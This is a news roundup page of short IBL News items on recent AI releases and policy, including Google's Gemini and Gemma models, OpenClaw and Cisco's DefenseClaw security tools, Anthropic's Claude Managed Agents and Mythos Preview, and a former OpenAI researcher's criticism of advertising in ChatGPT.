Category: Top News

  • Google Released Its Most Advanced Audio and Voice Model, Gemini 3.1 Flash Live

    Google Released Its Most Advanced Audio and Voice Model, Gemini 3.1 Flash Live

    IBL News | New York

    Google announced its most advanced audio and voice, multi-lingual model, Gemini 3.1 Flash Live.

    “This model delivers the speed and natural rhythm and dialogue needed for the next generation of voice-first AI,” said the company. “It’s also better at dynamically adjusting its response to users’ expressions of frustration or confusion and handles tasks in noisy environments.”

    3.1 Flash Live is available via Search Live and Gemini Live. For developers, it is in preview via the Gemini Live API in Google AI Studio; for enterprises, it is in Gemini Enterprise for Customer Experience.

    3.1 Flash Live lets people use their voice to vibe code and quickly iterate.

    All audio generated by 3.1 Flash Live is watermarked with SynthID. This imperceptible watermark is interwoven directly into the audio output, enabling reliable detection of AI-generated content and helping prevent misinformation.

  • “2026 will Be the Year of Agents,” Said the Developer Who Created Open Claw

    “2026 will Be the Year of Agents,” Said the Developer Who Created Open Claw

    IBL News | New York

    Peter Steinberger, the Austrian programmer who created OpenClaw [in the picture], said, “2026 will be the year of agents.”

    “2023-2024 was the year of ChatGPT; last year was the year of the coding agent, this year’s going to be the year of the general agent,” he explained.

    Jensen Huang, CEO at Nvidia, last month hailed the tool—whose symbol is a bright red lobster—as “the next ChatGPT.”

    However, the buzz has raised concerns about the cybersecurity risks of allowing AI systems, which are vulnerable to hacking, to access personal data such as bank details.

    Steinberger built OpenClaw in November while playing around with AI coding tools to organize his digital life.

    He has since been hired by OpenAI “to drive the next generation of personal agents,” Sam Altman said in February.

    “The next AI innovation could come from someone who just wants to have fun,” Steinberger said.

  • “OpenAI Is Deploying a Technology that Manipulates Users at No Cost,” Writes a Former Researcher in the NYT

    “OpenAI Is Deploying a Technology that Manipulates Users at No Cost,” Writes a Former Researcher in the NYT

    IBL News | New York

    Zoë Hitzig, a researcher at OpenAI who resigned, wrote an Op-Ed in The New York Times denouncing how the San Francisco-based company is deploying a technology that manipulates users at no cost. “I have deep reservations about OpenAI’s strategy.”

    His concerns increased after OpenAI had decided to include ads in its ChatGPT, “creating a potential for manipulating users in ways we don’t have the tools to understand, let alone prevent.” 

    “Tech companies can pursue options that limit incentives to surveil, profile, and manipulate their users.”

    “The erosion of OpenAI’s own principles to maximize engagement may already be underway. It’s against company principles to optimize user engagement solely to generate more advertising revenue, but it has been reported that the company already optimizes for daily active users anyway, likely by encouraging the model to be more flattering and sycophantic. This optimization can make users feel more dependent on A.I. for support in their lives. We’ve seen the consequences of dependence, including psychiatrists documenting instances of “chatbot psychosis” and allegations that ChatGPT reinforced suicidal ideation in some users.”

    This researcher suggests three possible approaches to avoid ads by using profits from one service or customer base to offset losses from another.

    • “If a business pays A.I. to do high-value labor at scale that was once the job of human employees — for example, a real-estate platform using A.I. to write listings or valuation reports — it should also pay a surcharge that subsidizes free or low-cost access for everyone else.”
    • “A second option is to accept advertising but pair it with real governance.”
    • “A third approach involves putting users’ data under independent control through a trust or cooperative with a legal duty to act in users’ interests.”
  • WordPress.com Introduced AI Agents that Can Create, Edit, and Manage Content

    WordPress.com Introduced AI Agents that Can Create, Edit, and Manage Content

    IBL News | New York

    The WordPress.com-hosted platform embraced AI agents to write and publish posts, landing pages, and About pages; manage comments; make structural changes; update and fix metadata; and organize content with tags and categories.

    With these new capabilities, websites can be created and run almost entirely by human-controlled AI agents. This lowers the barrier to setting up and maintaining websites

    The new AI capabilities follow the introduction of MCP on WordPress.com last fall, which allows applications to provide context to LLMs.

    With write capabilities, an AI agent with natural-language commands can:

    • Draft and publish blog posts: The user provides copy or describes what they want to publish, and the AI agent creates the post directly.
    • Build and update pages: Create landing pages, About pages, and more, complete with the site’s design specs and block patterns.
    • Manage comments: Approve, reply to, or clean up comments without ever opening the dashboard.
    • Organize the content: Create, rename, and restructure categories and tags across the site.
    • Update media metadata: Fix alt text, captions, and titles for better accessibility and SEO.

    Before creating content, the AI agent searches the theme’s design and understands its colors, fonts, spacing, and block patterns.

    To enable the new functionality on their accounts, WordPress.com customers will go to wordpress.com/mcp paid plans (starting at $4) and then toggle on the capabilities they want to use. They can then connect their preferred AI client, such as Claude, Cursor, ChatGPT, or any other MCP-enabled tool, and begin creating.

    WordPress provided some prompt examples to spark creativity.

  • Anthropic Announced ‘Claude Managed Agents’, a Tool to Automate Work Tasks

    Anthropic Announced ‘Claude Managed Agents’, a Tool to Automate Work Tasks

    IBL News | New York

    Anthropic announced on Wednesday the launch of Claude Managed Agents, an enterprise tool for building and deploying AI agents to automate work tasks.

    Managed Agents will come with a built-in sandboxed environment where the agent can securely spin up software projects. The product also allows developers to create agents that can run autonomously in the cloud for hours, monitor what other Claude agents are doing, and toggle permissions to allow agents to access specific tools.

    Competitor OpenAI, which is also preparing to go public this year, has an agent platform called Frontier.

    On Tuesday, Anthropic said that its annualized recurring revenue has surpassed $30 billion, roughly three times higher than it was in December 2025. The majority of the company’s recent revenue growth has come from Claude Platform and Claude Code.

  • Coding Is Being Automated by AI: Silicon Valley Got Hit First

    Coding Is Being Automated by AI: Silicon Valley Got Hit First

    IBL News | New York

    In the era of AI agents, many Silicon Valley programmers are now barely programming.

    Computer programming has undergone many changes over its 80-year history. Now, coding itself is being automated, and Silicon Valley got hit first.

    The New York Times posted an analysis examining this phenomenon.

    Coding is perhaps the first form of industrialized human labor that AI can actually replace. AI-generated code, if it passes its tests and works, is worth as much as what humans get paid $200,000 or more a year to compose.

    Now, coding is becoming a conversation, a back-and-forth talk fest between software developers and their bots. The work of a developer is now more about judgment than creation. Nobody is doing code by hand anymore.

    A coder is becoming more like an architect than a construction worker. Developers using AI focus on the overall shape of the software, how its features and facets work together.

    Because the agents can produce functioning code so quickly, their human overseers can experiment, trying things out to see what works and discarding what doesn’t.

    For most of the coders, working with AI means constantly talking and chatting, in a complex and highly technical way, with AI, a kind of alien life form, or agents that are tweaking the codebase. An amateur can’t do it for now.

    For now, it’s a delusion to imagine that your AI agent will generate a whole project at once.

    Developers are mostly weirdly enthusiastic about their new powers and increased productivity, although they can’t figure out what it means for the future of their profession.

    The reason is that software developers say their training and expertise are still needed: knowing how a big codebase ought to be structured and how to design the system. Several developers, in fact, suggested that the number of software jobs might grow.

    However, how things will shake out for professional coders themselves isn’t yet clear.

  • Cisco Launched ‘DefenseClaw’ Open-Source Security Tools for OpenClaw

    Cisco Launched ‘DefenseClaw’ Open-Source Security Tools for OpenClaw

    IBL News | New York

    Cisco has launched DefenseClaw, a free, open-source security tool for OpenClaw that runs inside NVIDIA’s OpenShell this month.

    In mid-March, at its GTC 2026 conference, NVIDIA announced NemoClaw and OpenShell to address security issues.

    OpenShell provides the infrastructure-level sandbox that OpenClaw never had — kernel isolation, deny-by-default network access, YAML-based policy enforcement, and a privacy router that keeps sensitive data local.

    It’s out-of-process enforcement, meaning the controls live outside the agent and can’t be overridden by it.

    Cisco Systems is building on that foundation. Its AI Defense team published research showing how malicious skills exploit the trust model — through prompt injection, credential theft, and silent exfiltration — and released an open source Skill Scanner so the community could start vetting what they install.

    OpenShell gives users a sandbox for the operational layer.

    Sitting on top of OpenShell, Cisco introduced an open-source agentic governance layer, DefenseClaw, that scans everything before it runs. Every skill, every tool, every plugin, and every piece of code generated by the Claw gets scanned before it’s allowed into any Claw environment.

    The scan engine includes five tools: skill-scanner, mcp-scanner, a2a-scanner, CodeGuard static analysis, and an AI bill of materials generator. Nothing bypasses the admission gate.

    DefenseClaw detects threats at runtime — not just at the gate. Claws are self-evolving systems. A skill that was clean on Tuesday can start exfiltrating data on Thursday. DefenseClaw doesn’t assume what passed admission stays safe — a content scanner inspects every message flowing in and out of the agent at the execution loop itself.

    Cisco explained:

    “DefenseClaw enforces block and allow lists — and enforcement is not advisory. When you block a skill, its sandbox permissions are revoked, its files are quarantined, and the agent gets an error if it tries to invoke it. When you block an MCP server, the endpoint is removed from the sandbox network allow-list, and OpenShell denies all connections. This happens in under two seconds, no restart required. These aren’t suggestions. They’re walls.”

    “And here’s the part that matters for anyone running Claws at scale: every claw is born observable.”

    “DefenseClaw connects to Splunk out of the box. Every scan finding, every block/allow decision, every prompt-response pair, every tool call, every policy enforcement action, every alert — it all streams into Splunk as structured events the moment your claw comes online. You don’t bolt on observability after the fact and hope you covered everything. The telemetry is there from the beginning. The goal is simple: if your claw does something — anything — there’s a record.”

    As an AI that reads personal files, manages tools, runs shell commands, and connects to platforms to build new capabilities, OpenClaw represents a paradigm shift — a new Jarvis — but it has also sparked one of the most concerning security crises in open-source history.

    Within three weeks of it going viral, OpenClaw suffered a wave of serious security incidents that forced nation-states, restricted agencies, and companies to stop running it.

    “I purposefully didn’t make OpenClaw simpler, but at the end of the day, if you build a hammer… You can hurt yourself. So should we not build hammers anymore?” explained the Austrian programmer who created OpenClaw.

    Some vulnerabilities seen included:

    • A critical remote code execution vulnerability; visiting a malicious webpage could hijack any agent.

    • 135,000+ exposed OpenClaw instances on the public internet.

    • A coordinated attack called ClawHavoc planted over 800 malicious skills in ClawHub — roughly 20 percent of the entire registry of productivity tools

    • A security researcher created a malicious third-party skill that performed data exfiltration and prompted injection without user awareness, demonstrating security flaws in OpenClaw implementations.

    To its credit, OpenClaw has been transparent about the risks, and the team has patched issues rapidly. But the structural reality is problematic: an agent with full system access, broad network reach, and a community-contributed skill ecosystem is a magnet for hackers.

  • Anthropic Announced the Frontier Model “Claude Mythos Preview” to Secure Most Critical Software

    Anthropic Announced the Frontier Model “Claude Mythos Preview” to Secure Most Critical Software

    IBL News | New York

    Anthropic announced yesterday “Project Glasswing, a new initiative focused on global safety and security on the software side.

    This new AI cybersecurity initiative has already garnered commitments from large technology companies, such as Apple, Amazon Web Services, Microsoft, Broadcom, Cisco, CrowdStrike, Google, JPMorganChase, the Linux Foundation, NVIDIA, and Palo Alto Networks

    To enhance their security projects, participant companies that will have the chance to build on Project Glasswing will have access to Claude Mythos Preview, a new general-purpose language model for computer security tasks.

    According to Anthropic, “Mythos Preview will help secure the world’s most critical software and prepare the industry for the practices we all will need to adopt to keep ahead of cyberattackers.”

    The company said that Mythos Preview already found “thousands of high-severity vulnerabilities” in “every major operating system and web browser,” especially “in real open source codebases.”

    Project Glasswing will help companies turn these capabilities “to work” and focus on “defensive purposes” against significant threats.

    “Over 99% of the vulnerabilities we’ve found have not yet been patched, so it would be irresponsible for us to disclose details about them (per our coordinated vulnerability disclosure process). Yet even the 1% of bugs we are able to discuss give a clear picture of a substantial leap in what we believe to be the next generation of models’ cybersecurity capabilities—one that warrants substantial coordinated defensive action across the industry. We conclude our post with advice for cyber defenders today, and a call for the industry to begin taking urgent action in response.”

    “During our testing, we found that Mythos Preview is capable of identifying and then exploiting zero-day vulnerabilities in every major operating system and every major web browser when directed by a user to do so. The vulnerabilities it finds are often subtle or difficult to detect. Many of them are ten or twenty years old, with the oldest we have found so far being a now-patched 27-year-old bug in OpenBSD—an operating system known primarily for its security.”

    “Non-experts can also leverage Mythos Preview to find and exploit sophisticated vulnerabilities. Engineers at Anthropic with no formal security training have asked Mythos Preview to find remote code execution vulnerabilities overnight, and woken up the following morning to a complete, working exploit. In other cases, we’ve had researchers develop scaffolds that allow Mythos Preview to turn vulnerabilities into exploits without any human intervention.”

  • Google Introduced ‘Gemma 4’, an Advanced Open-Source AI Model

    Google Introduced ‘Gemma 4’, an Advanced Open-Source AI Model

    IBL News | New York

    Google introduced an advanced open-source model, Gemma 4, under a commercially permissive Apache 2.0 license. This model has been built for advanced reasoning and agentic workflows, according to the company.

    Gemma 4 was released in four sizes: Effective 2B (E2B), Effective 4B (E4B), 26B Mixture of Experts (MoE), and 31B Dense.

    The 31B model currently ranks #3 among open models on the industry-standard Arena AI text leaderboard, and the 26B model is securing the #6 spot.

    Gemma 4 models specifically can run on Android devices and laptop GPUs.

    Agentic workflows feature native support for function calling, structured JSON output, and system instructions. It enables the building of autonomous agents that can interact with various tools and APIs and execute workflows reliably.

    Gemma 4 supports high-quality offline code generation, turning the user’s workstation into a local-first AI code assistant.

    The models natively process video and images, support variable resolutions, and excel at visual tasks such as OCR and chart understanding. Additionally, the E2B and E4B models feature native audio input for speech recognition and understanding.

    Gemma 4 presents a longer context. The edge models feature a 128K context window, while the larger models offer up to 256K, allowing users to pass repositories or long documents in a single prompt.

    According to Google, these multimodal models run completely offline with near-zero latency across edge devices like phones, Raspberry Pi, NVIDIA, and Jetson Orin Nano.

    Android developers can now prototype agentic flows in the AICore Developer Preview for forward compatibility with Gemini Nano 4.

    Google is offering Gemma 4 in Google AI Studio (31B and 26B MoE) or in Google AI Edge Gallery (E4B and E2B).

    First-generation Gemma models have registered over 400 million downloads, generating a Gemmaverse of more than 100,000 variants.

  • Anthropic Banned Subscription OAuth Tokens Across OpenClaw and Third-Party Agent Tools

    Anthropic Banned Subscription OAuth Tokens Across OpenClaw and Third-Party Agent Tools

    IBL News | New York

    Anthropic banned, this month, the use of subscription OAuth tokens across OpenClaw, Hermes, and other third-party agent tools. Also, using OpenClaw with Claude AI will be more expensive, due to Anthropic’s new policy changes.

    A newly published Legal and Compliance page on the Claude Code docs spelled it out:

    “Using OAuth tokens obtained through Claude Free, Pro, or Max accounts in any other product, tool, or service — including the Agent SDK — is not permitted and constitutes a violation of the Consumer Terms of Service.”

    Additionally, an email sent by Anthropic’s Claude on Friday evening noted that, starting April 4th, users wouldn’t be able to use their Claude subscription limits and would need to use a “pay-as-you-go option” billed separately.

    With OpenClaw creator Peter Steinberger now employed by OpenAI, Anthropic is encouraging subscribers to use more of its own tools, like Claude Cowork.

    Alternatives to Claude plans included models with their own subscriptions, open-source LLMs that can be run locally, such as GLM 5, and other models, such as Minimax 2.7, KiloCode, and OpenAI’s Codex.